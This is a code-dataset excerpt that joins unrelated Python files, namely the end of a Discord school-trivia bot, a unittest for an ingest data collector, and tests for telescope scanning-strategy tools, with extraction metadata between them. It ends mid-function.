"When did NT switch to a new building? \na) 2008 \nb) 2009 \nc) 2010 \nd) 2011" : "c",
"What was Graffiti originally known as? \na) The NTCI Post \nb) Graffiti \nc) The NT Star \nd) The Roehampton Edition" : "d",
"Which of the following teachers are married to another teacher at NT? \na) Miron \nb) Zohar \nc) Seepersad \nd) Kinoshita" : "d"
}
questions = list(answers.keys())
#print(questions)
scores = {
}
def get_question():
index = randint(0, len(questions)-1)
return questions[index], answers[questions[index]]
class trivia(commands.Cog):
def __init__(self, client):
self.client = client
@commands.Cog.listener()
async def on_message(self, message):
if message.content.startswith('!start_trivia'):
print(str(message.author)[:-5])
curr_questions = []
curr_answers = []
count = 0
while count < 3:
qs, answer = get_question()
if qs in curr_questions:
continue
else:
curr_questions.append(qs)
curr_answers.append(answer)
count += 1
await message.channel.send(qs)
if str(message.author)[:-5] not in scores.keys():
scores[str(message.author)[:-5]] = 0
curr_score = 0
def check(m):
return m.author == message.author
try:
guess = await self.client.wait_for('message', check=check, timeout=30.0)
except asyncio.TimeoutError:
return await message.channel.send('Sorry, you took too long')
user_answers = guess.content
#print(user_answers)
user_answers = str(user_answers).split()
#print(user_answers)
i = 0
while i < len(user_answers):
#print(user_answers[i])
try:
if user_answers[i] == answers[curr_questions[i]]:
await message.channel.send('Correct!')
curr_score += 1
#val = "here is your current score:" + str(scores[str(message.author)[:-5]])
else:
await message.channel.send('Wrong!')
except:
await message.channel.send("error")
i += 1
val = "Your final score: " + str(curr_score) + "/3"
await message.channel.send(val)
if scores[str(message.author)[:-5]] < curr_score:
scores[str(message.author)[:-5]] = curr_score
@commands.command()
async def my_trivia_score(self, ctx):
#print(str(ctx.author)[:-5])
#print(scores[str(ctx.author)[:-5]])
try:
val = scores[str(ctx.author)[:-5]]
if val >= 3:
val = "your highest quiz score is: " + str(val) + ". You are a patriot to NT."
await ctx.send(val)
else:
val = "your highest quiz score is: " + str(val) + ". You could do better :("
await ctx.send(val)
except TypeError:
await ctx.send("No quiz record found :(")
#await ctx.send(scores[str(ctx.author)[:-5]])
@commands.command()
async def trivia_instructions(self, ctx):
await ctx.send("This NT trivia will have 3 question multiple choice questions that you have to answer in 30 seconds. Use the command: '!start_trivia' to start the trivia. Once it is started, the questions will be printed. Type your answers out in a single line with the letter of the option and a space between each answer. Submit by pressing enter. Once you've submitted the bot will type out your score. \n Use the command: 'my_trivia_score' to see your highest trivia score. ")
"""
questions = ["starting", "q2", "q3"]
answers = {
"starting" : "hi",
"q2" : "hi2",
"q3" : "hi3"
}
for question in questions:
argument[question] = ""
class quiz(commands.Cog):
def __init__(self, client):
self.client = client
@commands.command()
async def new_quiz(self, ctx):
score = 0
for question in questions:
await ctx.send(question)
if question == "starting:":
continue
else:
@commands.Cog.listener()
async def on_message(self, message: discord.Message):
await ctx.send("Next question:")
if answers[question] == message.content:
await ctx.send("correct!")
score += 1
else:
await ctx.send("wrong!")
await ctx.send("your score was:", score)
"""
def setup(client):
client.add_cog(trivia(client))
| [
"discord.ext.commands.Cog.listener",
"discord.ext.commands.command"
] | [((1314, 1337), 'discord.ext.commands.Cog.listener', 'commands.Cog.listener', ([], {}), '()\n', (1335, 1337), False, 'from discord.ext import commands\n'), ((3403, 3421), 'discord.ext.commands.command', 'commands.command', ([], {}), '()\n', (3419, 3421), False, 'from discord.ext import commands\n'), ((4052, 4070), 'discord.ext.commands.command', 'commands.command', ([], {}), '()\n', (4068, 4070), False, 'from discord.ext import commands\n')] |
import json
import os
import unittest
from unittest.mock import MagicMock
from ingest.api.ingestapi import IngestApi
from ingest.downloader.data_collector import DataCollector
class DataCollectorTest(unittest.TestCase):
def setUp(self) -> None:
self.maxDiff = None
self.mock_ingest_api = MagicMock(spec=IngestApi)
self.data_collector = DataCollector(self.mock_ingest_api)
self.script_dir = os.path.dirname(__file__)
self.parent_dir = os.path.split(self.script_dir)[0]
self.resources_dir = os.path.join(self.parent_dir, 'resources')
def test_collect_data_by_submission_uuid_returns_correctly(self):
# given
project = self._make_project_data()
self._mock_ingest_api(project)
expected_json = [project['project']] + \
project['biomaterials'] + \
project['processes'] + \
project['protocols'] + \
project['files']
# when
project_uuid = '1234'
entity_dict = self.data_collector.collect_data_by_submission_uuid(project_uuid)
# then
self._assert_all_entities_are_created(entity_dict, expected_json)
self._assert_entities_have_correct_inputs(entity_dict)
def _assert_all_entities_are_created(self, entity_dict, expected_json):
expected_content_list = [entity['content'] for entity in expected_json]
actual_content_list = [entity.content for entity in entity_dict.values()]
self.assertCountEqual(expected_content_list, actual_content_list)
def _assert_entities_have_correct_inputs(self, entity_dict):
specimen = entity_dict['6197380b2807a377aad3a303']
donor = entity_dict['6197380b2807a377aad3a302']
process = entity_dict['6197380b2807a377aad3a30c']
protocols = [entity_dict['6197380b2807a377aad3a307']]
self.assertEqual(specimen.inputs, [donor])
self.assertEqual(specimen.process, process)
self.assertEqual(specimen.protocols, protocols)
self.assertCountEqual([input.id for input in specimen.inputs], [donor.id], 'The specimen has no donor input.')
self.assertEqual(specimen.process.id, process.id,
'The process which links the specimen to the donor is missing.')
self.assertEqual([protocol.id for protocol in specimen.protocols], [protocol.id for protocol in protocols],
'The protocols for the process which links the specimen to the donor are incorrect.')
cell_suspension = entity_dict['6197380b2807a377aad3a304']
file = entity_dict['6197380b2807a377aad3a306']
assay_process = entity_dict['6197380b2807a377aad3a30e']
assay_process_protocols = [entity_dict['6197380b2807a377aad3a30a'], entity_dict['6197380b2807a377aad3a30b']]
self.assertCountEqual([input.id for input in file.inputs], [cell_suspension.id],
'The sequencing file has no cell suspension input.')
self.assertEqual(file.process.id, assay_process.id,
'The process which links the file to the cell suspension is missing.')
self.assertEqual([protocol.id for protocol in file.protocols],
[protocol.id for protocol in assay_process_protocols],
'The protocols for the process which links the file to the cell suspension is incorrect.')
def _mock_ingest_api(self, project):
self.mock_ingest_api.get_submission_by_uuid.return_value = project['submission']
self.mock_ingest_api.get_related_project.return_value = project['project']
response = MagicMock()
response.json.return_value = project['linking_map']
self.mock_ingest_api.get.return_value = response
self.mock_ingest_api.get_related_entities.side_effect = \
[
iter(project['biomaterials']),
iter(project['processes']),
iter(project['protocols']),
iter(project['files'])
]
def _make_project_data(self):
with open(self.resources_dir + '/mock_submission.json') as file:
mock_submission_json = json.load(file)
with open(self.resources_dir + '/mock_project.json') as file:
mock_project_json = json.load(file)
with open(self.resources_dir + '/mock_biomaterials.json') as file:
mock_biomaterials_json = json.load(file)
with open(self.resources_dir + '/mock_processes.json') as file:
mock_processes_json = json.load(file)
with open(self.resources_dir + '/mock_protocols.json') as file:
mock_protocols_json = json.load(file)
with open(self.resources_dir + '/mock_files.json') as file:
mock_files_json = json.load(file)
with open(self.resources_dir + '/linking-map.json') as file:
linking_map = json.load(file)
return {
'submission': mock_submission_json,
'project': mock_project_json,
'biomaterials': mock_biomaterials_json,
'processes': mock_processes_json,
'protocols': mock_protocols_json,
'files': mock_files_json,
'linking_map': linking_map
}
if __name__ == '__main__':
unittest.main()
| [
"unittest.mock.MagicMock",
"os.path.join",
"ingest.downloader.data_collector.DataCollector",
"os.path.split",
"json.load",
"os.path.dirname",
"unittest.main"
] | [((5330, 5345), 'unittest.main', 'unittest.main', ([], {}), '()\n', (5343, 5345), False, 'import unittest\n'), ((312, 337), 'unittest.mock.MagicMock', 'MagicMock', ([], {'spec': 'IngestApi'}), '(spec=IngestApi)\n', (321, 337), False, 'from unittest.mock import MagicMock\n'), ((368, 403), 'ingest.downloader.data_collector.DataCollector', 'DataCollector', (['self.mock_ingest_api'], {}), '(self.mock_ingest_api)\n', (381, 403), False, 'from ingest.downloader.data_collector import DataCollector\n'), ((430, 455), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (445, 455), False, 'import os\n'), ((545, 587), 'os.path.join', 'os.path.join', (['self.parent_dir', '"""resources"""'], {}), "(self.parent_dir, 'resources')\n", (557, 587), False, 'import os\n'), ((3687, 3698), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (3696, 3698), False, 'from unittest.mock import MagicMock\n'), ((482, 512), 'os.path.split', 'os.path.split', (['self.script_dir'], {}), '(self.script_dir)\n', (495, 512), False, 'import os\n'), ((4227, 4242), 'json.load', 'json.load', (['file'], {}), '(file)\n', (4236, 4242), False, 'import json\n'), ((4345, 4360), 'json.load', 'json.load', (['file'], {}), '(file)\n', (4354, 4360), False, 'import json\n'), ((4473, 4488), 'json.load', 'json.load', (['file'], {}), '(file)\n', (4482, 4488), False, 'import json\n'), ((4595, 4610), 'json.load', 'json.load', (['file'], {}), '(file)\n', (4604, 4610), False, 'import json\n'), ((4717, 4732), 'json.load', 'json.load', (['file'], {}), '(file)\n', (4726, 4732), False, 'import json\n'), ((4831, 4846), 'json.load', 'json.load', (['file'], {}), '(file)\n', (4840, 4846), False, 'import json\n'), ((4942, 4957), 'json.load', 'json.load', (['file'], {}), '(file)\n', (4951, 4957), False, 'import json\n')] |
""""
STRIP Scanning Strategy Tools test module.
"""
import unittest
import healpy as hp
import numpy as np
from ScanningTools import ScanningTools as st
from astropy.time import Time
from astropy.coordinates import SkyCoord, AltAz
from ScanningTools.Quaternions import Quaternion as q
angles = np.array([[-10, 45, 59],
[30, 35, 15],
[-180, 25, 20],
[3, 4, 5]])
hours = np.array([[23, 59, 16],
[7, 56, 59]])
t = np.array([1.546585, -0.56, 0.3333333333333333333, -1.001])
### INSTRUMENT CHARACTERISTICS ###
pointing_accuracy = np.array([0, 0, 25]) #deg (arcsec)
###
### LOCATION INFORMATION ###
LAT = np.array([28, 16, 24]) #deg
LONG = np.array([-16, 38, 32]) #deg
Height = 2400 #m
loc = st.get_location(LAT, LONG, Height)
###
### TIME INFORMATION ###
LCT_start = (0, 0, 0) #h, m, s
LCD_start = (1, 1, 2015) #g, m, y
UTC, DST = (0 , 0) #h
###
### ENGINE ROTATION INFORMATION ###
zenith_distance = 31 #deg
polarization_angle = 60 #deg
###
class TestScanningTools(unittest.TestCase):
def test_period2sec(self):
one_sidereal_year = st.period2sec(years=1, days=0, hours=0, min=0, sec=0, sidereal=True)
one_solar_year = st.period2sec(years=1, days=0, hours=0, min=0, sec=0)
one_sidereal_day = st.period2sec(years=0, days=1, hours=0, min=0, sec=0, sidereal=True)
one_solar_day = st.period2sec(years=0, days=1, hours=0, min=0, sec=0)
period_0 = st.period2sec(years=1, days=1, hours=0, min=0, sec=0, sidereal=True)
period_1 = st.period2sec(years=5, days=30, hours=0, min=0, sec=0, sidereal=True)
period_2 = st.period2sec(years=2, days=17, hours=0, min=0, sec=0, sidereal=True)
period_3 = st.period2sec(years=10, days=21, hours=15, min=3, sec=25, sidereal=True)
self.assertEqual(one_sidereal_year, 31558145)
self.assertEqual(one_solar_year, 31536000)
self.assertEqual(one_sidereal_day, 86164)
self.assertEqual(one_solar_day, 86400)
self.assertEqual(period_0, 31644309)
self.assertEqual(period_1, 160375649)
self.assertEqual(period_2, 64581080)
self.assertEqual(period_3, 317445103)
def test_sex2dec(self):
ang0 = st.sex2dec(angles)
ang1 = st.sex2dec(angles[0], radians=True)
self.assertTrue(np.allclose(ang0, np.array([-10.76638889, 30.587500, -180.422222,
3.06805556])))
self.assertEqual(ang1, np.radians(ang0[0]))
def test_dec2sex(self):
t0 = st.dec2sex(t)
t00 = st.dec2sex(t[0])
self.assertTrue(np.allclose(t0, np.array([[1, 32, 47.706], [-0, 33, 36], [0, 20, 0],
[-1, 0, 3.6]])))
self.assertTrue(np.allclose(t00, np.array([1, 32, 47.706])))
def test_degrees2hours(self):
ang0 = st.degrees2hours(angles)
ang1 = st.degrees2hours(angles[2], decimal=True)
self.assertTrue(np.allclose(ang0, st.dec2sex(st.sex2dec(angles) / 15)))
self.assertTrue(np.allclose(ang1, st.sex2dec(angles)[2] / 15))
def test_hours2degrees(self):
ang0 = st.hours2degrees(hours[1])
ang1 = st.hours2degrees(hours, decimal=True)
self.assertTrue(np.allclose(ang0, st.dec2sex(st.sex2dec(hours[1]) * 15)))
self.assertTrue(np.allclose(ang1, st.sex2dec(hours) * 15))
def test_LocalCivilTime2JulianDay(self):
"Integrated Test: it includes also the LCT2GCD and GCD2JD function conversion"
Jul_1_2013 = st.LocalCivilTime2JulianDay((3, 37, 0), (1, 7, 2013), UTC=4, DST=1)
Jun_19_2009 = st.LocalCivilTime2JulianDay((18, 0, 0), (19, 6, 2009), UTC=0, DST=0)
self.assertTrue(np.allclose(Jul_1_2013, 2456474.442))
self.assertTrue(np.allclose(Jun_19_2009, 2455002.25))
t = Time(['2015-1-1 00:00:10', '2018-1-3 5:15:24.3', '1980-4-22 19:30:2']).jd
T = np.array([st.LocalCivilTime2JulianDay((0, 0, 10), (1, 1, 2015), UTC=0, DST=0),
st.LocalCivilTime2JulianDay((5, 15, 24.3), (3, 1, 2018), UTC=0, DST=0),
st.LocalCivilTime2JulianDay((19, 30, 2), (22, 4, 1980), UTC=0, DST=0)])
self.assertTrue(np.allclose(t, T))
def test_LocalCivilTime2LocalSiderealTime(self):
LONG = st.dec2sex(0.1)
Jun_19_2009 = st.LocalCivilTime2LocalSiderealTime((18, 0, 0),
(19, 6, 2009),
LONG, UTC=0, DST=0)
self.assertTrue(np.allclose(Jun_19_2009, np.array([11, 52, 46.843])))
def test_get_nside_eff(self):
fwhm_beam0 = np.array([0, 5, 0]) #deg (arcmin)
fwhm_beam1 = np.array([0, 21, 0]) #deg (arcmin)
fwhm_beam2 = np.array([0, 32, 0]) #deg (arcmin)
self.assertEqual(st.get_nside_eff(fwhm_beam0), 1024)
self.assertEqual(st.get_nside_eff(fwhm_beam1), 256)
self.assertEqual(st.get_nside_eff(fwhm_beam2), 128)
def test_get_full_fp(self):
def general_test(x_fp, i, j):
self.assertTrue(np.allclose(x_fp[i, 0], x_fp[j, 0]))
self.assertTrue(np.allclose(x_fp[i, 1], -x_fp[j, 1]))
self.assertTrue(np.allclose(x_fp[i, 2], x_fp[j, 2]))
x_fp, n_horns = st.get_full_fp('./ScanningTools/fp_data/fp_theta.txt',
'./ScanningTools/fp_data/fp_phi.txt')
self.assertTrue(np.allclose(np.sum(x_fp**2, axis=1), 1))
self.assertEqual(n_horns, 49)
general_test(x_fp, 7, 42)
general_test(x_fp, 8, 47)
general_test(x_fp, 9, 46)
general_test(x_fp, 10, 45)
general_test(x_fp, 11, 44)
general_test(x_fp, 12, 43)
general_test(x_fp, 13, 48)
general_test(x_fp, 14, 35)
general_test(x_fp, 15, 40)
general_test(x_fp, 16, 39)
general_test(x_fp, 17, 38)
general_test(x_fp, 18, 37)
general_test(x_fp, 19, 36)
general_test(x_fp, 20, 41)
general_test(x_fp, 21, 28)
general_test(x_fp, 22, 33)
general_test(x_fp, 23, 32)
general_test(x_fp, 24, 31)
general_test(x_fp, 25, 30)
general_test(x_fp, 26, 29)
general_test(x_fp, 27, 34)
def get_full_fp_polarization_angles(self):
def general_test(x_fp, i, j):
self.assertTrue(np.allclose(x_fp[i, 0], x_fp[j, 0]))
self.assertTrue(np.allclose(x_fp[i, 1], -x_fp[j, 1]))
self.assertTrue(np.allclose(x_fp[i, 2], x_fp[j, 2]))
full_psi, polarization_versor = st.get_full_fp_polarization_angles(
'./ScanningTools/fp_data/fp_psi.txt')
self.assertTrue(np.allclose(np.sum(polarization_versor**2, axis=1), 1))
self.assertEqual(len(full_psi), 49)
self.assertEqual(len(polarization_versor), 49)
general_test(polarization_versor, 7, 42)
general_test(polarization_versor, 8, 47)
general_test(polarization_versor, 9, 46)
general_test(polarization_versor, 10, 45)
general_test(polarization_versor, 11, 44)
general_test(polarization_versor, 12, 43)
general_test(polarization_versor, 13, 48)
general_test(polarization_versor, 14, 35)
general_test(polarization_versor, 15, 40)
general_test(polarization_versor, 16, 39)
general_test(polarization_versor, 17, 38)
general_test(polarization_versor, 18, 37)
general_test(polarization_versor, 19, 36)
general_test(polarization_versor, 20, 41)
general_test(polarization_versor, 21, 28)
general_test(polarization_versor, 22, 33)
general_test(polarization_versor, 23, 32)
general_test(polarization_versor, 24, 31)
general_test(polarization_versor, 25, 30)
general_test(polarization_versor, 26, 29)
general_test(polarization_versor, 27, 34)
def test_get_timeJD(self):
def general_tests(time, sampling_rate, JD, JD_step, t0, t1):
self.assertTrue(np.allclose(time[1:] - time[0:-1], 1 / sampling_rate))
self.assertEqual(len(JD), len(time))
self.assertEqual(np.sum(np.diff(JD_step)), 0)
self.assertTrue(np.allclose((t1-t0).sec, 1 / sampling_rate, rtol=1e-3))
def tests_1h(obs_t, time, sampling_rate, JD, JD_step, t0, t1):
self.assertEqual(obs_t, 3600)
self.assertEqual(len(time), obs_t * sampling_rate)
general_tests(time, sampling_rate, JD, JD_step, t0, t1)
def tests_1d(LCT_start, LCD_start, obs_t, time, sampling_rate, JD, JD_step, t0, t1, UTC=UTC,
DST=DST):
general_tests(time, sampling_rate, JD, JD_step, t0, t1)
obs_t0, time0, JD0 = st.get_timeJD(LCT_start, LCD_start, sampling_rate, obs_time,
UTC=UTC, DST=DST, day=None)
self.assertEqual(obs_t, 86400)
self.assertEqual(obs_t, obs_t0)
self.assertEqual(len(time), obs_t * sampling_rate)
self.assertTrue(len(time), len(time0))
self.assertTrue(len(JD), len(JD0))
def tests_1y(LCT_start, LCD_start, obs_t, time, sampling_rate, JD, JD_step, t0, t1, UTC=UTC,
DST=DST, day=None):
general_tests(time, sampling_rate, JD, JD_step, t0, t1)
self.assertEqual(obs_t, 86400 * 365)
if day:
self.assertEqual(len(time), 86400 * sampling_rate)
if day > 1:
self.assertTrue(time[0] != 0)
else:
self.assertTrue(time[0] == 0)
else:
self.assertEqual(len(time), obs_t * sampling_rate)
sampling_rate = 50 #Hz
obs_time = (0, 0, 1, 0, 0) #y, d, h, m, s
day = None
obs_t, time, JD = st.get_timeJD(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC,
DST=DST, day=day)
JD_step = JD[1:] - JD[:-1]
t0 = Time(JD[0], format='jd', location=loc)
t1 = Time(JD[0] + JD_step[0], format='jd', location=loc)
tests_1h(obs_t, time, sampling_rate, JD, JD_step, t0, t1)
sampling_rate = 5 #Hz
obs_t, time, JD = st.get_timeJD(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC,
DST=DST, day=day)
JD_step = JD[1:] - JD[:-1]
t0 = Time(JD[0], format='jd', location=loc)
t1 = Time(JD[0] + JD_step[0], format='jd', location=loc)
tests_1h(obs_t, time, sampling_rate, JD, JD_step, t0, t1)
sampling_rate = 3 #Hz
obs_time = (0, 1, 0, 0, 0) #y, d, h, m, s
day = 1
obs_t, time, JD = st.get_timeJD(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC,
DST=DST, day=day)
JD_step = JD[1:] - JD[:-1]
t0 = Time(JD[0], format='jd', location=loc)
t1 = Time(JD[0] + JD_step[0], format='jd', location=loc)
tests_1d(LCT_start, LCD_start, obs_t, time, sampling_rate, JD, JD_step, t0, t1, UTC=UTC,
DST=DST)
sampling_rate = 1 #Hz
obs_time = (1, 0, 0, 0, 0) #y, d, h, m, s
day0, day1, day2, day3, day4 = (1, 5, 364, None, None)
obs_t0, time0, JD0 = st.get_timeJD(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC,
DST=DST, day=day0)
JD_step0 = JD0[1:] - JD0[:-1]
t00 = Time(JD0[0], format='jd', location=loc)
t10 = Time(JD0[0] + JD_step0[0], format='jd', location=loc)
tests_1y(LCT_start, LCD_start, obs_t0, time0, sampling_rate, JD0, JD_step0, t00, t10,
UTC=UTC, DST=DST, day=day0)
obs_t1, time1, JD1 = st.get_timeJD(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC,
DST=DST, day=day1)
JD_step1 = JD1[1:] - JD1[:-1]
t01 = Time(JD1[0], format='jd', location=loc)
t11 = Time(JD1[0] + JD_step1[0], format='jd', location=loc)
tests_1y(LCT_start, LCD_start, obs_t1, time1, sampling_rate, JD1, JD_step1, t01, t11,
UTC=UTC, DST=DST, day=day1)
obs_t2, time2, JD2 = st.get_timeJD(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC,
DST=DST, day=day2)
JD_step2 = JD2[1:] - JD2[:-1]
t02 = Time(JD2[0], format='jd', location=loc)
t12 = Time(JD2[0] + JD_step2[0], format='jd', location=loc)
tests_1y(LCT_start, LCD_start, obs_t2, time2, sampling_rate, JD2, JD_step2, t02, t12,
UTC=UTC, DST=DST, day=day2)
obs_t3, time3, JD3 = st.get_timeJD(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC,
DST=DST, day=day3)
JD_step3 = JD3[1:] - JD3[:-1]
t03 = Time(JD3[0], format='jd', location=loc)
t13 = Time(JD3[0] + JD_step3[0], format='jd', location=loc)
tests_1y(LCT_start, LCD_start, obs_t3, time3, sampling_rate, JD3, JD_step3, t03, t13,
UTC=UTC, DST=DST, day=day3)
LCT_start4 = (12, 0, 0)
obs_t4, time4, JD4 = st.get_timeJD(LCT_start4, LCD_start, sampling_rate, obs_time, UTC=UTC,
DST=DST, day=day4)
JD_step4 = JD4[1:] - JD4[:-1]
t04 = Time(JD4[0], format='jd', location=loc)
t14 = Time(JD4[0] + JD_step4[0], format='jd', location=loc)
tests_1y(LCT_start4, LCD_start, obs_t4, time4, sampling_rate, JD4, JD_step4, t04, t14,
UTC=UTC, DST=DST, day=day4)
def test_spin_generator(self):
def general_spin_tests(phi, obs_time, time, sampling_rate, rpm, day=None):
if day:
self.assertEqual(len(phi), 86400 * sampling_rate)
else:
self.assertEqual(len(phi), obs_time * sampling_rate)
self.assertEqual(
np.sum(np.r_[True, phi[1:] > phi[:-1]] & np.r_[phi[:-1] > phi[1:], True]),
rpm * len(phi) / sampling_rate / 60)
self.assertEqual(phi.min(), 0)
self.assertTrue(phi.max() < 2 * np.pi)
obs_time1, obs_time2, obs_time3 = ((0, 30, 0, 0, 0), (0, 1, 0, 0, 0), (0, 0, 1, 0, 0))
sampling_rate1, sampling_rate2, sampling_rate3 = (1, 3, 50)
rpm1, rpm2, rpm3 = (13, 1, 5)
day1, day2, day3 = (2, None, None)
obs_t1, time1, JD1 = st.get_timeJD(LCT_start, LCD_start, sampling_rate1, obs_time1, UTC=UTC,
DST=DST, day=day1)
phi1 = st.spin_generator(time1, rpm1)
general_spin_tests(phi1, obs_t1, time1, sampling_rate1, rpm1, day=day1)
obs_t2, time2, JD2 = st.get_timeJD(LCT_start, LCD_start, sampling_rate2, obs_time2, UTC=UTC,
DST=DST, day=day2)
phi2 = st.spin_generator(time2, rpm2)
general_spin_tests(phi2, obs_t2, time2, sampling_rate2, rpm2, day=day2)
obs_t3, time3, JD3 = st.get_timeJD(LCT_start, LCD_start, sampling_rate3, obs_time3, UTC=UTC,
DST=DST, day=day3)
phi3 = st.spin_generator(time3, rpm3)
general_spin_tests(phi3, obs_t3, time3, sampling_rate3, rpm3, day=day3)
def test_euler_rotation_matrix(self):
phi1, theta1, psi1 = np.radians(([10, 10, 10], [30, 30, 30], [0, 0, 0]))
m1 = st.euler_rotation_matrix(phi1, theta1, psi1)
M1 = np.array([[0.98480775301220802, -0.1503837331804353, 0.086824088833465152],
[0.17364817766693033, 0.85286853195244328, -0.49240387650610395],
[0, 0.49999999999999994, 0.86602540378443871]])
phi2, theta2, psi2 = np.radians(([10, 10, 10], [30, 30, 30], [45, 45, 45]))
m2 = st.euler_rotation_matrix(phi2, theta2, psi2)
M2 = np.array([[0.59002688280798476, -0.80270159783205308, 0.086824088833465152],
[0.72585692637316113, 0.4802813184352156, -0.49240387650610395],
[0.35355339059327368, 0.35355339059327373, 0.86602540378443871]])
phi3, theta3, psi3 = np.radians(([10, 10, 10], [30, 30, 30], [45, 0, 45]))
m3 = st.euler_rotation_matrix(phi3, theta3, psi3)
M3 = np.array([[[0.59002688280798476, -0.80270159783205308, 0.086824088833465152],
[0.72585692637316113, 0.4802813184352156, -0.49240387650610395],
[0.35355339059327368, 0.35355339059327373, 0.86602540378443871]],
[[0.98480775301220802, -0.1503837331804353, 0.086824088833465152],
[0.17364817766693033, 0.85286853195244328, -0.49240387650610395],
[0, 0.49999999999999994, 0.86602540378443871]],
[[0.59002688280798476, -0.80270159783205308, 0.086824088833465152],
[0.72585692637316113, 0.4802813184352156, -0.49240387650610395],
[0.35355339059327368, 0.35355339059327373, 0.86602540378443871]]])
self.assertTrue(np.allclose(m1, np.repeat(M1[None, ...], 3, axis=0)))
self.assertTrue(np.allclose(m2, np.repeat(M2[None, ...], 3, axis=0)))
self.assertTrue(np.allclose(m3, M3))
def test_engine_rotations(self):
obs_time = (0, 0, 0, 30, 0)
obs_t, time, JD = st.get_timeJD(LCT_start, LCD_start, 50, obs_time, UTC=UTC, DST=DST,
day=None)
rpm = 7
theta, phi, psi = st.get_engine_rotations(time, rpm, zenith_distance, polarization_angle)
self.assertEqual(len(theta), len(time))
self.assertEqual(len(phi), len(time))
self.assertEqual(len(psi), len(time))
self.assertTrue(np.allclose(theta[1:] - theta[:-1], 0))
self.assertTrue(np.allclose(psi[1:] - psi[:-1], 0))
def test_fp_rotations(self):
def general_tests(fp_pointings, fp_pointings_c):
self.assertTrue(np.allclose(np.diff(fp_pointings_c[..., 2], axis=-1), 0))
self.assertTrue(np.degrees(fp_pointings[..., 0]).max() <= 365)
self.assertTrue(np.degrees(fp_pointings[..., 1]).max() <= 365)
self.assertTrue(np.allclose(np.sum(fp_pointings_c**2, axis=-1), 1))
x_fp, n_horns = st.get_full_fp('./ScanningTools/fp_data/fp_theta.txt',
'./ScanningTools/fp_data/fp_phi.txt')
obs_time1, obs_time2 = ((0, 0, 0, 30, 0), (0, 90, 0, 0, 0))
rpm1, rpm2 = (7, 2)
day1, day2 = (None, 10)
sampling_rate1, sampling_rate2 = (50, 1)
obs_t1, time1, JD1 = st.get_timeJD(LCT_start, LCD_start, sampling_rate1, obs_time1, UTC=UTC,
DST=DST, day=day1)
theta1, phi1, psi1 = st.get_engine_rotations(time1, rpm1, zenith_distance,
polarization_angle)
obs_t2, time2, JD2 = st.get_timeJD(LCT_start, LCD_start, sampling_rate2, obs_time2, UTC=UTC,
DST=DST, day=day2)
theta2, phi2, psi2 = st.get_engine_rotations(time2, rpm2, zenith_distance,
polarization_angle)
n1 = 30
n2 = None
fp_rot1 = st.euler_rotation_matrix(phi1, theta1, psi1)
fp_rot2 = st.euler_rotation_matrix(phi2, theta2, psi2)
fp_pointings1 = st.get_fp_rotations(phi1, theta1, psi1, x_fp, n_horns, time1, n=n1,
cartesian=False)
fp_pointings1_c = st.get_fp_rotations(phi1, theta1, psi1, x_fp, n_horns, time1, n=n1,
cartesian=True)
fp_pointings2 = st.get_fp_rotations(phi2, theta2, psi2, x_fp, n_horns, time2, n=n2,
cartesian=False)
fp_pointings2_c = st.get_fp_rotations(phi2, theta2, psi2, x_fp, n_horns, time2, n=n2,
cartesian=True)
i = np.random.randint(0, len(time1))
self.assertTrue(np.allclose(np.dot(fp_rot1[i], x_fp[n1]), fp_pointings1_c[i]))
rot1 = q.get_quaternion_from_euler(phi1[i], theta1[i], psi1[i])
self.assertTrue(np.allclose(rot1.rotate_vector_by_quaternion(x_fp[n1]).get_versor(),
fp_pointings1_c[i, :]))
general_tests(fp_pointings1, fp_pointings1_c)
j = np.random.randint(0, len(time2))
p = np.random.randint(0, n_horns)
self.assertTrue(np.allclose(np.dot(fp_rot2[j], x_fp[p]), fp_pointings2_c[p][j]))
rot2 = q.get_quaternion_from_euler(phi2[j], theta2[j], psi2[j])
self.assertTrue(np.allclose(rot2.rotate_vector_by_quaternion(x_fp[p]).get_versor(),
fp_pointings2_c[p, j, :]))
general_tests(fp_pointings2, fp_pointings2_c)
def test_get_horizon_coordinates(self):
def general_tests(Alt, Az):
self.assertTrue(np.degrees(Alt.max()) <= 90)
self.assertTrue(np.degrees(Alt.min()) >= 0)
self.assertTrue(np.degrees(Az.max()) <= 360)
self.assertTrue(np.degrees(Az.min()) >= 0)
x_fp, n_horns = st.get_full_fp('./ScanningTools/fp_data/fp_theta.txt',
'./ScanningTools/fp_data/fp_phi.txt')
obs_time = (0, 2, 0, 0, 0)
sampling_rate = 1
rpm = 4
day = 1
n1, n2 = (0, 15)
obs_t, time, JD = st.get_timeJD(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC,
DST=DST, day=day)
theta, phi, psi = st.get_engine_rotations(time, rpm, zenith_distance, polarization_angle)
fpp = st.get_fp_rotations(phi, theta, psi, x_fp, n_horns, time, n=None, cartesian=False)
fpp1 = st.get_fp_rotations(phi, theta, psi, x_fp, n_horns, time, n=n1, cartesian=False)
fpp2 = st.get_fp_rotations(phi, theta, psi, x_fp, n_horns, time, n=n2, cartesian=False)
Alt, Az = st.get_horizon_coordinates(fpp)
Alt1, Az1 = st.get_horizon_coordinates(fpp1)
Alt2, Az2 = st.get_horizon_coordinates(fpp2)
def test_get_icrs_coordinates(self):
x_fp, n_horns = st.get_full_fp('./ScanningTools/fp_data/fp_theta.txt',
'./ScanningTools/fp_data/fp_phi.txt')
obs_time = (0, 2, 0, 0, 0)
sampling_rate = 0.001
rpm = 3
day1, day2 = (2, None)
n1, n2 = (48, None)
obs_t1, time1, JD1 = st.get_timeJD(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC,
DST=DST, day=day1)
obs_t2, time2, JD2 = st.get_timeJD(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC,
DST=DST, day=day2)
theta1, phi1, psi1 = st.get_engine_rotations(time1, rpm, zenith_distance,
polarization_angle)
theta2, phi2, psi2 = st.get_engine_rotations(time2, rpm, zenith_distance,
polarization_angle)
fpp1 = st.get_fp_rotations(phi1, theta1, psi1, x_fp, n_horns, time1, n=n1, cartesian=False)
